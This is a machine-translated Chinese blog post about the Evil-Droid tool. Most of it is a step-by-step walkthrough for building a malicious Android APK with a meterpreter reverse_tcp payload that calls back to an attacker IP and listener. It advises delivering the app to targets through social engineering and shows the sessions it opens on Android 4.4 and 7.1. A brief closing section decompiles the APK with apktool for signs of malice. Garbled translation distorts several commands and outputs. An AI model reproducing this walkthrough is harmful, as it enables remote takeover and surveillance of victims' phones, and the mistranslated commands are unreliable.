- A+
所属分类:安全技术
Android是一个开源平台,任何个人开发人员都可以将想法实现到Android应用程序中。 对于Android开发人员以及可以根据他们的需求使用大量应用程序的用户来说,这是一个很大的优势。 Android确实提供了许多功能,但也最容易受到攻击。 Android确实有很多漏洞,攻击者有利于窃取目标凭据。 根据CVE(Common Vulnerability Exposures),android有很多漏洞可以用来绕过android安全。
CVE显示了许多漏洞,这些漏洞主要由攻击者使用。 今天我们将展示一个名为Evil Droid的工具,用于创建不同的有效负载以危害Android设备。 国际网络安全研究所的道德黑客研究员表示,这个Evil-droid可用于生成恶意apk以穿透Android设备。
- Evil-Droid已经安装在Kali Linux 2018.4 amd64上。
- 对于克隆类型git clone https://github.com/M4sc3r4n0/Evil-Droid.git
- 键入cd Evil-Droid
- 输入chmod u + x evil-droid
- 输入./evil-droid
====================== SNIP ========================
- 输入1
- 启动APK MSF
- 键入本地IP地址(攻击者的IP地址)类型192.168.1.5
- 键入端口号以侦听类型4444
- 输入恶意apk名称。 输入testapk
- 选择android / meterpreter / reverse_tcp
- 选择多处理程序
- 然后单击“ 确定”
- Evil-droid创建了恶意应用程序。 现在,您可以通过社交工程将应用程序发送到目标。
- 为了测试,我们使用了Android 4.4 iso。 从以下网址下载Android 4.4: https : //sourceforge.net/projects/android-x86/files/latest/download
- 我们已经在Vmware工作站中启动了实时启动 。
- 将恶意测试apk安装到android 4.4中
- 在安装之前,它会要求接受未知来源。 打开“未知来源”,然后安装test.apk
- 因为test.apk在android中打开。
- 将在Evil-droid监听器中创建会话。 另一个终端将自动打开以创建和运行会话。
- Evil-droid meterpreter提供与metasploit meterpreter相同的命令。 你可以轻易地操纵你的目标。
- 对于另一项测试,我们使用了Android 7.1 iso。
从以下网址下载Android 7.1: https : //osdn.net/projects/android-x86/downloads/67834/android-x86_64-7.1-r2.iso/ - 我们已经在Vmware工作站中启动了实时启动 。
- 将恶意测试apk安装到android 7.1中
- 在安装之前,它会要求接受未知来源。 打开“未知来源”,然后安装test.apk。
- 因为test.apk在android中打开。
- 将在Evil-droid监听器中创建会话。
- 另一个终端将自动打开以创建和运行会话。
- Evil-droid meterpreter提供与metasploit meterpreter相同的命令。 你可以轻易地操纵你的目标。
使用FATRAT可以完成对Android设备的相同利用,了解它是如何工作的, 使用fatrat一步一步的教程来破解windows android mac
扭转由Evil-Droid生成的Mailcious Apk: -
对于任何Android应用程序的逆向工程,有各种工具用于反编译APK。 但最流行的反编译器称为apktool ,用于反编译Android应用程序。 我们使用了预装在Kali Linux 2018.4 (amd64)中的apktool。
- 打开另一个终端类型apktool -h
root @kali:/ home / iicybersecurity / Downloads / Evil-Droid / evil / smali / com / jpzqkxcarh / zsehpukvxy# apktool -h 无法识别的选项:-h Apktool v2.2.2 - 重新设计Android apk文件的工具 与smali v2.1.3和baksmali v2.1.3 版权所有2014RyszardWiśniewskibrut.alll@gmail.com 由Connor Tumbleson connor.tumbleson@gmail.com更新 用法:apktool -advance, - 高级打印预先信息。 -version, - 版本打印版本然后退出 用法:apktool如果| install-framework [options] -p, - 帧路径 将框架文件存储到。 -t, - 标记Tag框架使用。 用法:apktool d [ecode] [选项] -f, - 强制删除目标目录。
- 输入apktool d evil.apk
root @ kali:/ home / iicybersecurity / Downloads / Evil-Droid# apktool d evil.apk 我:在evil.apk上使用Apktool 2.2.2 我:加载资源表... I:使用资源解码AndroidManifest.xml ... I:从文件加载资源表: 我:定期清单包... 我:解码文件资源...... I:解码值/ XML ... 我:Baksmaling classes.dex ... 我:复制资产和库... 我:复制未知文件...... 我:复制原始文件... / root / .local / share / apktool / framework / 1.apk
- 执行上述查询后,apktool已将恶意apk提取到一组XML中。 这些XML用于取证。
- 当我们进一步分析时,我们发现恶意apk创建了具有混乱/随机字母名称的目录。 如果扫描任何普通应用程序,它将不会创建任何具有此类名称的随机目录。 此行为表明存在恶意apk。
root @kali:/ home / iicybersecurity / Downloads / Evil-Droid #cd / evil / smali / com root @ kali:/ home / iicybersecurity / Downloads / Evil-Droid / evil / smali / com# ls jpzqkxcarh
2019年3月4日